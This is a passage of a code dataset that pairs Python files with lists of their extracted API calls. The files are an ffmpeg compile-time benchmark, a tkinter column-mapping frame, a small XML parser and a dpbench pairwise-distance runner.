MOCK_INTEGRATION_LONG_DESCRIPTION, mock_import_definition, mock_import_definition_tagged, mock_config_str, mock_config_list, mock_setup_py_file_lines, mock_parsed_setup_py_attributes, mock_icon_extension_logo, mock_icon_company_logo, mock_message_destination_to_be_tagged, mock_message_destination_tagged, mock_extension_zip_file_structure, mock_executables_zip_file_structure\n'), ((4954, 5023), 'os.path.join', 'os.path.join', (['path_fn_mock_integration', '"""icons"""', '"""extension_logo.png"""'], {}), "(path_fn_mock_integration, 'icons', 'extension_logo.png')\n", (4966, 5023), False, 'import os\n'), ((5052, 5119), 'os.path.join', 'os.path.join', (['path_fn_mock_integration', '"""icons"""', '"""company_logo.png"""'], {}), "(path_fn_mock_integration, 'icons', 'company_logo.png')\n", (5064, 5119), False, 'import os\n'), ((5156, 5228), 'os.path.join', 'os.path.join', (['path_fn_mock_integration', '"""icons"""', '"""mock_corrupt_icon.jpg"""'], {}), "(path_fn_mock_integration, 'icons', 'mock_corrupt_icon.jpg')\n", (5168, 5228), False, 'import os\n'), ((5264, 5336), 'os.path.join', 'os.path.join', (['path_fn_mock_integration', '"""icons"""', '"""mock_corrupt_icon.png"""'], {}), "(path_fn_mock_integration, 'icons', 'mock_corrupt_icon.png')\n", (5276, 5336), False, 'import os\n'), ((8583, 8607), 'resilient_circuits.util.ext.ExtCreate.ExtCreate', 'ExtCreate', (['"""ext:package"""'], {}), "('ext:package')\n", (8592, 8607), False, 'from resilient_circuits.util.ext.ExtCreate import ExtCreate, PATH_DEFAULT_ICON_EXTENSION_LOGO, PATH_DEFAULT_ICON_COMPANY_LOGO\n'), ((8643, 8674), 'os.makedirs', 'os.makedirs', (['path_temp_test_dir'], {}), '(path_temp_test_dir)\n', (8654, 8674), False, 'import os\n'), ((8734, 8767), 'shutil.rmtree', 'shutil.rmtree', (['path_temp_test_dir'], {}), '(path_temp_test_dir)\n', (8747, 8767), False, 'import shutil\n'), ((9271, 9340), 'os.path.join', 'os.path.join', (['path_temp_test_dir', '"""ext-fn_mock_integration-1.0.0.zip"""'], {}), 
"(path_temp_test_dir, 'ext-fn_mock_integration-1.0.0.zip')\n", (9283, 9340), False, 'import os\n'), ((394, 419), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (409, 419), False, 'import os\n'), ((3024, 3070), 'copy.deepcopy', 'copy.deepcopy', (['self.original_import_definition'], {}), '(self.original_import_definition)\n', (3037, 3070), False, 'import copy\n'), ((3240, 3306), 'copy.deepcopy', 'copy.deepcopy', (['self.original_mock_message_destination_to_be_tagged'], {}), '(self.original_mock_message_destination_to_be_tagged)\n', (3253, 3306), False, 'import copy\n'), ((5446, 5496), 'os.path.basename', 'os.path.basename', (['PATH_DEFAULT_ICON_EXTENSION_LOGO'], {}), '(PATH_DEFAULT_ICON_EXTENSION_LOGO)\n', (5462, 5496), False, 'import os\n'), ((5756, 5806), 'os.path.basename', 'os.path.basename', (['PATH_DEFAULT_ICON_EXTENSION_LOGO'], {}), '(PATH_DEFAULT_ICON_EXTENSION_LOGO)\n', (5772, 5806), False, 'import os\n'), ((6037, 6085), 'os.path.basename', 'os.path.basename', (['PATH_DEFAULT_ICON_COMPANY_LOGO'], {}), '(PATH_DEFAULT_ICON_COMPANY_LOGO)\n', (6053, 6085), False, 'import os\n'), ((6334, 6382), 'os.path.basename', 'os.path.basename', (['PATH_DEFAULT_ICON_COMPANY_LOGO'], {}), '(PATH_DEFAULT_ICON_COMPANY_LOGO)\n', (6350, 6382), False, 'import os\n'), ((9443, 9485), 'zipfile.is_zipfile', 'zipfile.is_zipfile', (['path_the_extension_zip'], {}), '(path_the_extension_zip)\n', (9461, 9485), False, 'import zipfile\n'), ((9603, 9657), 'zipfile.ZipFile', 'zipfile.ZipFile', ([], {'file': 'path_the_extension_zip', 'mode': '"""r"""'}), "(file=path_the_extension_zip, mode='r')\n", (9618, 9657), False, 'import zipfile\n'), ((9978, 10032), 'zipfile.ZipFile', 'zipfile.ZipFile', ([], {'file': 'path_the_extension_zip', 'mode': '"""r"""'}), "(file=path_the_extension_zip, mode='r')\n", (9993, 10032), False, 'import zipfile\n'), ((10320, 10380), 'zipfile.ZipFile', 'zipfile.ZipFile', ([], {'file': 'path_the_executable_zip_file', 'mode': '"""r"""'}), 
"(file=path_the_executable_zip_file, mode='r')\n", (10335, 10380), False, 'import zipfile\n'), ((10889, 10943), 'zipfile.ZipFile', 'zipfile.ZipFile', ([], {'file': 'path_the_extension_zip', 'mode': '"""r"""'}), "(file=path_the_extension_zip, mode='r')\n", (10904, 10943), False, 'import zipfile\n'), ((11108, 11154), 'os.path.join', 'os.path.join', (['path_temp_test_dir', '"""export.res"""'], {}), "(path_temp_test_dir, 'export.res')\n", (11120, 11154), False, 'import os\n'), ((11205, 11255), 'os.path.join', 'os.path.join', (['path_temp_test_dir', '"""extension.json"""'], {}), "(path_temp_test_dir, 'extension.json')\n", (11217, 11255), False, 'import os\n'), ((11614, 11668), 'zipfile.ZipFile', 'zipfile.ZipFile', ([], {'file': 'path_the_extension_zip', 'mode': '"""r"""'}), "(file=path_the_extension_zip, mode='r')\n", (11629, 11668), False, 'import zipfile\n'), ((11956, 12016), 'zipfile.ZipFile', 'zipfile.ZipFile', ([], {'file': 'path_the_executable_zip_file', 'mode': '"""r"""'}), "(file=path_the_executable_zip_file, mode='r')\n", (11971, 12016), False, 'import zipfile\n'), ((12202, 12253), 'os.path.join', 'os.path.join', (['path_temp_test_dir', '"""executable.json"""'], {}), "(path_temp_test_dir, 'executable.json')\n", (12214, 12253), False, 'import os\n'), ((6686, 6734), 'os.path.basename', 'os.path.basename', (['PATH_DEFAULT_ICON_COMPANY_LOGO'], {}), '(PATH_DEFAULT_ICON_COMPANY_LOGO)\n', (6702, 6734), False, 'import os\n'), ((6942, 6992), 'os.path.basename', 'os.path.basename', (['PATH_DEFAULT_ICON_EXTENSION_LOGO'], {}), '(PATH_DEFAULT_ICON_EXTENSION_LOGO)\n', (6958, 6992), False, 'import os\n'), ((7210, 7260), 'os.path.basename', 'os.path.basename', (['PATH_DEFAULT_ICON_EXTENSION_LOGO'], {}), '(PATH_DEFAULT_ICON_EXTENSION_LOGO)\n', (7226, 7260), False, 'import os\n'), ((7491, 7541), 'os.path.basename', 'os.path.basename', (['PATH_DEFAULT_ICON_EXTENSION_LOGO'], {}), '(PATH_DEFAULT_ICON_EXTENSION_LOGO)\n', (7507, 7541), False, 'import os\n')]
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import os, sys, shutil, platform
import urllib.request
import subprocess
import tarfile
import cpuinfo.cpuinfo as cpuinfo
import time
import statistics
def check_deps(args):
    """Verify that yasm and every requested compiler are on the PATH.

    Args:
        args: iterable of executable names that must be resolvable.

    Exits with status -2 if yasm is missing, -3 if any command is missing.
    """
    # yasm is required to assemble ffmpeg; check both Unix and Windows names.
    # Use 'is None' for the None singleton comparison (PEP 8) instead of '=='.
    if shutil.which('yasm') is None and shutil.which('yasm.exe') is None:
        print('yasm is not installed or in the PATH')
        sys.exit(-2)
    for command in args:
        if shutil.which(command) is None:
            print('Cannot find ' + command + ' executable')
            sys.exit(-3)
def download_and_extract_ffmpeg():
    """Download the ffmpeg 2.8.4 source tarball (if absent) and unpack it.

    Side effect: decompress_file() changes the working directory into the
    extracted source tree.
    """
    print('\nDownloading ffmpeg sources...')
    # NOTE(review): plain http; ffmpeg.org also serves https - consider
    # switching if download integrity matters.
    url = 'http://ffmpeg.org/releases/ffmpeg-2.8.4.tar.gz'
    file_name = url.split('/')[-1]
    if not os.path.isfile(file_name):
        # Context managers guarantee both the response and the target file
        # are closed even if the download fails part-way through.
        with urllib.request.urlopen(url) as response, \
                open(file_name, 'wb') as out_file:
            out_file.write(response.read())
    print('Source code downloaded!\n')
    decompress_file(file_name)
def decompress_file(file_name):
    """Extract a .tar.gz archive and chdir into the extracted directory.

    Args:
        file_name: archive name of the form '<dir>.tar.gz'; the archive is
            expected to contain a top-level directory named '<dir>'.
    """
    print('Decompressing sources...')
    # Context manager guarantees the archive handle is closed on any exit.
    with tarfile.open(file_name, 'r:gz') as archive:
        # NOTE(review): extractall() trusts member paths; fine for the known
        # ffmpeg tarball, unsafe for untrusted archives (path traversal).
        archive.extractall()
    print('Sources decompressed!')
    # 'ffmpeg-2.8.4.tar.gz'.split('.tar')[0] -> 'ffmpeg-2.8.4'
    os.chdir(file_name.split('.tar')[0])
def configure(compiler):
    """Run ffmpeg's ./configure in the current directory with a given compiler.

    Args:
        compiler: C compiler executable name, passed as --cc.

    Exits with status -4 if ./configure returns a non-zero status.
    """
    conf = './configure --disable-doc --cc=' + compiler
    try:
        # subprocess.DEVNULL replaces the original open(os.devnull) handle,
        # which was never closed (file-descriptor leak).
        subprocess.check_call(conf.split(), stdout=subprocess.DEVNULL,
                              stderr=subprocess.STDOUT)
    except subprocess.CalledProcessError as err:
        print('Error using ./configure: {0}'.format(err))
        sys.exit(-4)
def compile():
    """Run make to build ffmpeg, discarding all build output.

    Exits with status -5 if the build fails.
    """
    try:
        # subprocess.DEVNULL replaces the leaked open(os.devnull) handle.
        subprocess.check_call(['make'], stdout=subprocess.DEVNULL,
                              stderr=subprocess.STDOUT)
    except subprocess.CalledProcessError as err:
        # BUG FIX: the original formatted the undefined name 'compiler' here,
        # raising NameError instead of reporting the actual build error.
        print('Error compiling: {0}'.format(err))
        sys.exit(-5)
def clean():
    """Run 'make clean', ignoring its exit status and discarding its output."""
    # subprocess.DEVNULL replaces the original open(os.devnull) handle,
    # which was never closed (file-descriptor leak).
    subprocess.call(['make', 'clean'], stdout=subprocess.DEVNULL,
                    stderr=subprocess.STDOUT)
def greeting():
    """Print the benchmark banner and reset matplotlib defaults when present."""
    print('/*****************************************************************/')
    print('/*            Benchmark to test compile times                    */')
    print('/*            with diferent compilers using ffmpeg               */')
    print('/*****************************************************************/')
    try:
        import matplotlib.pyplot as plt
    except ImportError:
        print('\nTo generate a graph of the stadistics you need to have installed matplotlib')
    else:
        plt.rcdefaults()
def show_results(names, times):
    """Print summary statistics for each compiler's measured build times.

    Args:
        names: display name per compiler.
        times: list of lists; times[i] holds the build durations (seconds)
            measured for names[i].
    """
    print('\nReview of the results:')
    print('Operating system: {0}'.format(platform.system_alias( \
        platform.system(), platform.release(), platform.version())))
    print( 'Processor: {0}'.format( cpuinfo.get_cpu_info().get('brand','') ) )
    for i in range(len(names)):
        samples = times[i]
        print('\nStatistics of {0}'.format(names[i]))
        print('Number of iterations: {0}'.format(len(samples)))
        print('min: {0}'.format(min(samples)))
        print('mean: {0} seconds'.format(statistics.mean(samples)))
        # BUG FIX: statistics.stdev() raises StatisticsError for fewer than
        # two samples, crashing the report when only one iteration was run.
        if len(samples) > 1:
            print('+/- stdev: {0}'.format(statistics.stdev(samples)))
        print('max: {0}'.format(max(samples)))
        print('median: {0} seconds'.format(statistics.median_high(samples)))
def main():
    """Entry point: parse argv, build ffmpeg with each compiler, report timings.

    Usage: python <script> <compiler 1> [<compiler 2> ...] <number of samples>
    """
    greeting()
    if len(sys.argv) < 3:
        # Message strings below were previously split with backslash line
        # continuations, which embedded stray indentation inside the output.
        print('\nUsage: python {0} <compiler 1> ... <number of samples>'.format(sys.argv[0]))
        sys.exit(-1)
    compilers = sys.argv[1:-1]
    iterations = int(sys.argv[-1])
    print('\n')
    names = []
    for comp in compilers:
        names.append(input('Give a name for the statistics of {0}: '.format(comp)))
    check_deps(compilers)
    download_and_extract_ffmpeg()  # also chdirs into the source tree
    times = []
    for x in range(len(compilers)):
        print('\nStarting configuration for {0}'.format(compilers[x]))
        # BUG FIX: configure the compiler being measured; the original passed
        # 'comp', the leftover loop variable, so every run used the last one.
        configure(compilers[x])
        times.append([])
        for i in range(1, iterations + 1):
            print('Compiling ffmpeg with {0}. {1}º time'.format(compilers[x], i))
            start = time.time()
            compile()
            end = time.time()
            times[x].append(end - start)
            clean()
    # Leave and delete the ffmpeg source tree.
    cwd = os.getcwd()
    os.chdir('..')
    shutil.rmtree(cwd)
    show_results(names, times)
    try:
        # Optional graph output; the duplicate matplotlib import was removed.
        import matplotlib.pyplot as plt
        import numpy as np
        plt.rcdefaults()
        y_pos = np.arange(len(compilers))
        means = []
        stdevs = []
        for i in range(len(compilers)):
            means.append(statistics.mean(times[i]))
            stdevs.append(statistics.stdev(times[i]))
        plt.barh(y_pos, means, xerr=stdevs, align='center', alpha=0.4)
        plt.yticks(y_pos, names)
        plt.xlabel('Compiling mean time(seconds)')
        plt.title('Compiling times for ffmpeg')
        fig = plt.gcf()
        fig.savefig('Results.png', dpi=fig.dpi)
        print('\nStatistics saved as Results.png')
    except ImportError:
        print('\nTo generate a graph of the stadistics you need to have installed matplotlib')
# Run the benchmark only when executed directly, not on import.
if __name__ == "__main__":
    main()
|
[
"matplotlib.pyplot.title",
"cpuinfo.cpuinfo.get_cpu_info",
"os.path.isfile",
"platform.release",
"shutil.rmtree",
"os.chdir",
"subprocess.check_call",
"matplotlib.pyplot.yticks",
"matplotlib.pyplot.rcdefaults",
"tarfile.open",
"statistics.median_high",
"statistics.stdev",
"shutil.which",
"matplotlib.pyplot.barh",
"statistics.mean",
"platform.system",
"platform.version",
"matplotlib.pyplot.gcf",
"sys.exit",
"os.getcwd",
"time.time",
"matplotlib.pyplot.xlabel"
] |
[((1035, 1066), 'tarfile.open', 'tarfile.open', (['file_name', '"""r:gz"""'], {}), "(file_name, 'r:gz')\n", (1047, 1066), False, 'import tarfile\n'), ((4203, 4214), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (4212, 4214), False, 'import os, sys, shutil, platform\n'), ((4219, 4233), 'os.chdir', 'os.chdir', (['""".."""'], {}), "('..')\n", (4227, 4233), False, 'import os, sys, shutil, platform\n'), ((4238, 4256), 'shutil.rmtree', 'shutil.rmtree', (['cwd'], {}), '(cwd)\n', (4251, 4256), False, 'import os, sys, shutil, platform\n'), ((357, 369), 'sys.exit', 'sys.exit', (['(-2)'], {}), '(-2)\n', (365, 369), False, 'import os, sys, shutil, platform\n'), ((710, 735), 'os.path.isfile', 'os.path.isfile', (['file_name'], {}), '(file_name)\n', (724, 735), False, 'import os, sys, shutil, platform\n'), ((1635, 1702), 'subprocess.check_call', 'subprocess.check_call', (['make'], {'stdout': 'FNULL', 'stderr': 'subprocess.STDOUT'}), '(make, stdout=FNULL, stderr=subprocess.STDOUT)\n', (1656, 1702), False, 'import subprocess\n'), ((2386, 2402), 'matplotlib.pyplot.rcdefaults', 'plt.rcdefaults', ([], {}), '()\n', (2400, 2402), True, 'import matplotlib.pyplot as plt\n'), ((3442, 3454), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (3450, 3454), False, 'import os, sys, shutil, platform\n'), ((4346, 4362), 'matplotlib.pyplot.rcdefaults', 'plt.rcdefaults', ([], {}), '()\n', (4360, 4362), True, 'import matplotlib.pyplot as plt\n'), ((4668, 4730), 'matplotlib.pyplot.barh', 'plt.barh', (['y_pos', 'means'], {'xerr': 'stdevs', 'align': '"""center"""', 'alpha': '(0.4)'}), "(y_pos, means, xerr=stdevs, align='center', alpha=0.4)\n", (4676, 4730), True, 'import matplotlib.pyplot as plt\n'), ((4739, 4763), 'matplotlib.pyplot.yticks', 'plt.yticks', (['y_pos', 'names'], {}), '(y_pos, names)\n', (4749, 4763), True, 'import matplotlib.pyplot as plt\n'), ((4772, 4814), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Compiling mean time(seconds)"""'], {}), "('Compiling mean time(seconds)')\n", (4782, 
4814), True, 'import matplotlib.pyplot as plt\n'), ((4823, 4862), 'matplotlib.pyplot.title', 'plt.title', (['"""Compiling times for ffmpeg"""'], {}), "('Compiling times for ffmpeg')\n", (4832, 4862), True, 'import matplotlib.pyplot as plt\n'), ((4877, 4886), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (4884, 4886), True, 'import matplotlib.pyplot as plt\n'), ((228, 248), 'shutil.which', 'shutil.which', (['"""yasm"""'], {}), "('yasm')\n", (240, 248), False, 'import os, sys, shutil, platform\n'), ((261, 285), 'shutil.which', 'shutil.which', (['"""yasm.exe"""'], {}), "('yasm.exe')\n", (273, 285), False, 'import os, sys, shutil, platform\n'), ((407, 428), 'shutil.which', 'shutil.which', (['command'], {}), '(command)\n', (419, 428), False, 'import os, sys, shutil, platform\n'), ((510, 522), 'sys.exit', 'sys.exit', (['(-3)'], {}), '(-3)\n', (518, 522), False, 'import os, sys, shutil, platform\n'), ((1537, 1549), 'sys.exit', 'sys.exit', (['(-4)'], {}), '(-4)\n', (1545, 1549), False, 'import os, sys, shutil, platform\n'), ((1820, 1832), 'sys.exit', 'sys.exit', (['(-5)'], {}), '(-5)\n', (1828, 1832), False, 'import os, sys, shutil, platform\n'), ((4069, 4080), 'time.time', 'time.time', ([], {}), '()\n', (4078, 4080), False, 'import time\n'), ((4121, 4132), 'time.time', 'time.time', ([], {}), '()\n', (4130, 4132), False, 'import time\n'), ((2672, 2689), 'platform.system', 'platform.system', ([], {}), '()\n', (2687, 2689), False, 'import os, sys, shutil, platform\n'), ((2691, 2709), 'platform.release', 'platform.release', ([], {}), '()\n', (2707, 2709), False, 'import os, sys, shutil, platform\n'), ((2711, 2729), 'platform.version', 'platform.version', ([], {}), '()\n', (2727, 2729), False, 'import os, sys, shutil, platform\n'), ((3054, 3079), 'statistics.mean', 'statistics.mean', (['times[i]'], {}), '(times[i])\n', (3069, 3079), False, 'import statistics\n'), ((3120, 3146), 'statistics.stdev', 'statistics.stdev', (['times[i]'], {}), '(times[i])\n', (3136, 3146), 
False, 'import statistics\n'), ((3240, 3272), 'statistics.median_high', 'statistics.median_high', (['times[i]'], {}), '(times[i])\n', (3262, 3272), False, 'import statistics\n'), ((4578, 4603), 'statistics.mean', 'statistics.mean', (['times[i]'], {}), '(times[i])\n', (4593, 4603), False, 'import statistics\n'), ((4631, 4657), 'statistics.stdev', 'statistics.stdev', (['times[i]'], {}), '(times[i])\n', (4647, 4657), False, 'import statistics\n'), ((2769, 2791), 'cpuinfo.cpuinfo.get_cpu_info', 'cpuinfo.get_cpu_info', ([], {}), '()\n', (2789, 2791), True, 'import cpuinfo.cpuinfo as cpuinfo\n')]
|
"""
Created on Feb 5, 2014
@author: <NAME>
"""
from tkinter import IntVar, StringVar, ttk, BooleanVar
from tkinter.constants import LEFT, X, RIGHT
from qal.common.strings import bool_to_binary_int, binary_int_to_bool, empty_when_none
from qal.tools.gui.frame_list import FrameCustomItem
__author__ = 'nibo'
class FrameMapping(FrameCustomItem):
    """Holds and visualizes a Map between two columns of different datasets.

    The row shows a source-column combobox, the source data type, the current
    data, an "is key" checkbox and a destination-column combobox.
    """
    # Class-level defaults; the tkinter variables below are (re)created per
    # instance in __init__.
    row_index = None
    is_key = None
    src_reference = None
    src_datatype = None
    src_cast_to = None
    dest_table = None
    curr_data = None
    curr_raw_data = None
    mapping = None
    preview = None
    dest_reference = None
    def __init__(self, _master, _mapping = None,
                 _on_get_source_references = None,
                 _on_get_destination_references = None,
                 _on_select = None):
        """Build the mapping row and optionally load an existing mapping.

        :param _master: parent tkinter widget.
        :param _mapping: optional mapping object copied into the GUI.
        :param _on_get_source_references: callback returning source column
            references for the combobox.
        :param _on_get_destination_references: callback returning destination
            column references for the combobox.
        :param _on_select: selection callback (stored; not used in this class).
        """
        super(FrameMapping, self).__init__(_master)
        # Add monitored variables.
        self.is_key = BooleanVar()
        self.src_reference = StringVar()
        self.src_datatype = StringVar()
        self.curr_data = StringVar()
        # NOTE(review): this assigns result_cast_to, but the class attribute
        # declared above is src_cast_to - confirm which name is intended.
        self.result_cast_to = StringVar()
        self.preview = StringVar()
        self.dest_reference = StringVar()
        self.on_get_source_references = _on_get_source_references
        self.on_get_destination_references = _on_get_destination_references
        self.on_select = _on_select
        self.init_widgets()
        self.mapping = _mapping
        if _mapping is not None:
            self.mapping_to_gui()
    def mapping_to_gui(self):
        """Copy values from self.mapping into the monitored tkinter variables."""
        self.src_reference.set(str(empty_when_none(self.mapping.src_reference)))
        self.dest_reference.set(str(empty_when_none(self.mapping.dest_reference)))
        self.src_datatype.set(self.mapping.src_datatype)
        self.is_key.set(bool_to_binary_int(self.mapping.is_key))
    def gui_to_mapping(self):
        """Copy the monitored tkinter variables back into self.mapping."""
        self.mapping.src_reference = self.src_reference.get()
        self.mapping.dest_reference = self.dest_reference.get()
        self.mapping.is_key = binary_int_to_bool(self.is_key.get())
    def reload_references(self):
        """Refresh both combobox value lists from the reference callbacks."""
        self.cb_source_ref['values'] = self.get_source_references()
        self.cb_dest_ref['values'] = self.get_destination_references()
    def get_source_references(self, _force = None):
        """Return source references via the callback; None when no callback is set."""
        if self.on_get_source_references:
            return self.on_get_source_references(_force)
    def get_destination_references(self, _force = None):
        """Return destination references via the callback; None when no callback is set."""
        if self.on_get_destination_references:
            return self.on_get_destination_references( _force)
    def on_change_source_ref(self, *args):
        """Placeholder trace callback for source-reference changes (no-op)."""
        # reload dataset.
        pass
    def init_widgets(self):
        """Init all widgets (pack order determines the row layout)."""
        # Source reference
        self.cb_source_ref = ttk.Combobox(self, textvariable=self.src_reference, state='normal')
        self.cb_source_ref['values'] = self.get_source_references()
        self.cb_source_ref.pack(side=LEFT, fill=X, expand=1)
        # Data type label
        self.l_data_type = ttk.Label(self, textvariable=self.src_datatype, width=8)
        self.src_datatype.set("Not set")
        self.l_data_type.pack(side=LEFT)
        # Dest reference
        self.cb_dest_ref = ttk.Combobox(self, textvariable=self.dest_reference, state='normal')
        self.cb_dest_ref['values'] = self.get_destination_references()
        self.cb_dest_ref.pack(side=RIGHT, fill=X, expand=1)
        # Is key field
        self.cb_is_key = ttk.Checkbutton(self, variable=self.is_key)
        self.cb_is_key.pack(side=RIGHT)
        # Current data
        self.l_data = ttk.Label(self, textvariable=self.curr_data)
        self.curr_data.set("No data")
        self.l_data.pack(side=RIGHT, fill=X, padx=5)
|
[
"tkinter.StringVar",
"tkinter.ttk.Label",
"qal.common.strings.empty_when_none",
"tkinter.ttk.Combobox",
"tkinter.BooleanVar",
"qal.common.strings.bool_to_binary_int",
"tkinter.ttk.Checkbutton"
] |
[((978, 990), 'tkinter.BooleanVar', 'BooleanVar', ([], {}), '()\n', (988, 990), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((1020, 1031), 'tkinter.StringVar', 'StringVar', ([], {}), '()\n', (1029, 1031), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((1060, 1071), 'tkinter.StringVar', 'StringVar', ([], {}), '()\n', (1069, 1071), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((1097, 1108), 'tkinter.StringVar', 'StringVar', ([], {}), '()\n', (1106, 1108), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((1140, 1151), 'tkinter.StringVar', 'StringVar', ([], {}), '()\n', (1149, 1151), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((1175, 1186), 'tkinter.StringVar', 'StringVar', ([], {}), '()\n', (1184, 1186), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((1218, 1229), 'tkinter.StringVar', 'StringVar', ([], {}), '()\n', (1227, 1229), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((2784, 2851), 'tkinter.ttk.Combobox', 'ttk.Combobox', (['self'], {'textvariable': 'self.src_reference', 'state': '"""normal"""'}), "(self, textvariable=self.src_reference, state='normal')\n", (2796, 2851), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((3036, 3092), 'tkinter.ttk.Label', 'ttk.Label', (['self'], {'textvariable': 'self.src_datatype', 'width': '(8)'}), '(self, textvariable=self.src_datatype, width=8)\n', (3045, 3092), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((3229, 3297), 'tkinter.ttk.Combobox', 'ttk.Combobox', (['self'], {'textvariable': 'self.dest_reference', 'state': '"""normal"""'}), "(self, textvariable=self.dest_reference, state='normal')\n", (3241, 3297), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((3478, 3521), 'tkinter.ttk.Checkbutton', 'ttk.Checkbutton', (['self'], {'variable': 'self.is_key'}), '(self, variable=self.is_key)\n', (3493, 3521), 
False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((3608, 3652), 'tkinter.ttk.Label', 'ttk.Label', (['self'], {'textvariable': 'self.curr_data'}), '(self, textvariable=self.curr_data)\n', (3617, 3652), False, 'from tkinter import IntVar, StringVar, ttk, BooleanVar\n'), ((1819, 1858), 'qal.common.strings.bool_to_binary_int', 'bool_to_binary_int', (['self.mapping.is_key'], {}), '(self.mapping.is_key)\n', (1837, 1858), False, 'from qal.common.strings import bool_to_binary_int, binary_int_to_bool, empty_when_none\n'), ((1609, 1652), 'qal.common.strings.empty_when_none', 'empty_when_none', (['self.mapping.src_reference'], {}), '(self.mapping.src_reference)\n', (1624, 1652), False, 'from qal.common.strings import bool_to_binary_int, binary_int_to_bool, empty_when_none\n'), ((1691, 1735), 'qal.common.strings.empty_when_none', 'empty_when_none', (['self.mapping.dest_reference'], {}), '(self.mapping.dest_reference)\n', (1706, 1735), False, 'from qal.common.strings import bool_to_binary_int, binary_int_to_bool, empty_when_none\n')]
|
from lxml import etree
def parse_xml(content):
    """Parse XML into a flat {tag: text} dict of the root's direct children.

    External entity resolution is disabled on the parser to guard against
    XXE-style attacks.
    """
    safe_parser = etree.XMLParser(resolve_entities=False)
    tree = etree.fromstring(content, parser=safe_parser)
    return {node.tag: node.text for node in tree}
|
[
"lxml.etree.XMLParser"
] |
[((106, 145), 'lxml.etree.XMLParser', 'etree.XMLParser', ([], {'resolve_entities': '(False)'}), '(resolve_entities=False)\n', (121, 145), False, 'from lxml import etree\n')]
|
# Copyright (C) 2017-2018 Intel Corporation
#
# SPDX-License-Identifier: MIT
import run_utils as utils
import numpy as np
import sys, os
import dpctl, dpctl.tensor as dpt
from dpbench_python.pairwise_distance.pairwise_distance_python import (
pairwise_distance_python,
)
from dpbench_datagen.pairwise_distance import gen_rand_data, gen_data_to_file
######################################################
# GLOBAL DECLARATIONS THAT WILL BE USED IN ALL FILES #
######################################################
# Python 2/3 compatibility shim: on Python 3 the bare 'xrange' lookup raises
# NameError, so alias it to range; on Python 2 the builtin is kept as-is.
try:
    xrange
except NameError:
    xrange = range
def gen_data(nopt, dims):
    """Generate random X/Y point sets plus an uninitialized distance buffer.

    Args:
        nopt: number of points per set.
        dims: point dimensionality.

    Returns:
        tuple: (X, Y, D) where D is an empty (nopt, nopt) output array.
    """
    x_arr, y_arr = gen_rand_data(nopt, dims)
    dist_buf = np.empty((nopt, nopt))
    return (x_arr, y_arr, dist_buf)
def run(name, sizes=5, step=2, nopt=2 ** 10):
    """Build the native pairwise-distance benchmark and run it over a size sweep.

    Args:
        name: benchmark display name (kept for interface compatibility; the
            body does not currently use it).
        sizes: default number of size steps (overridable via --steps).
        step: default growth factor between steps (overridable via --step).
        nopt: default initial problem size (overridable via --size).
    """
    import argparse

    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--steps", required=False, default=sizes, help="Number of steps"
    )
    parser.add_argument(
        "--step", required=False, default=step, help="Factor for each step"
    )
    parser.add_argument(
        "--size", required=False, default=nopt, help="Initial data size"
    )
    parser.add_argument(
        "--repeat", required=False, default=1, help="Iterations inside measured region"
    )
    parser.add_argument(
        "--text", required=False, default="", help="Print with each result"
    )
    parser.add_argument("-d", type=int, default=3, help="Dimensions")
    parser.add_argument(
        "--usm",
        required=False,
        action="store_true",
        help="Use USM Shared or pure numpy",
    )
    parser.add_argument(
        "--test",
        required=False,
        action="store_true",
        # BUG FIX: corrected the "naieve" typo in the user-visible help text.
        help="Check for correctness by comparing output with naive Python version",
    )

    args = parser.parse_args()
    sizes = int(args.steps)
    step = int(args.step)
    nopt = int(args.size)
    repeat = int(args.repeat)
    dims = int(args.d)

    # Rebuild the native binary from scratch; --usm selects the USM variant.
    utils.run_command(["make", "clean"], verbose=True)
    if args.usm:
        utils.run_command(["make", "comp"], verbose=True)
        exec_name = "./pairwise_distance_comp"
    else:
        utils.run_command(["make"], verbose=True)
        exec_name = "./pairwise_distance"

    if args.test:
        # Validate one native run against the pure-Python reference.
        X, Y, p_D = gen_data(nopt, dims)
        pairwise_distance_python(X, Y, p_D)
        gen_data_to_file(nopt, dims)
        utils.run_command([exec_name, str(nopt), str(1), "-t"], verbose=True)
        # The native binary writes its result matrix to D.bin.
        n_D = np.fromfile("D.bin").reshape(nopt, nopt)
        if np.allclose(n_D, p_D):
            print("Test succeeded\n")
        else:
            print("Test failed\n")
        return

    # Start the timings file fresh for this sweep.
    if os.path.isfile("runtimes.csv"):
        os.remove("runtimes.csv")

    for _ in xrange(sizes):
        gen_data_to_file(nopt, dims)
        utils.run_command([exec_name, str(nopt), str(repeat)], verbose=True)
        nopt *= step
        # Shrink the repeat count as the problem grows, but never below 1.
        repeat -= step
        if repeat < 1:
            repeat = 1
# Run the dpcpp pairwise-distance benchmark when executed as a script.
if __name__ == "__main__":
    run("Pairwise distance dpcpp")
|
[
"os.remove",
"argparse.ArgumentParser",
"numpy.fromfile",
"run_utils.run_command",
"numpy.empty",
"numpy.allclose",
"dpbench_python.pairwise_distance.pairwise_distance_python.pairwise_distance_python",
"os.path.isfile",
"dpbench_datagen.pairwise_distance.gen_data_to_file",
"dpbench_datagen.pairwise_distance.gen_rand_data"
] |
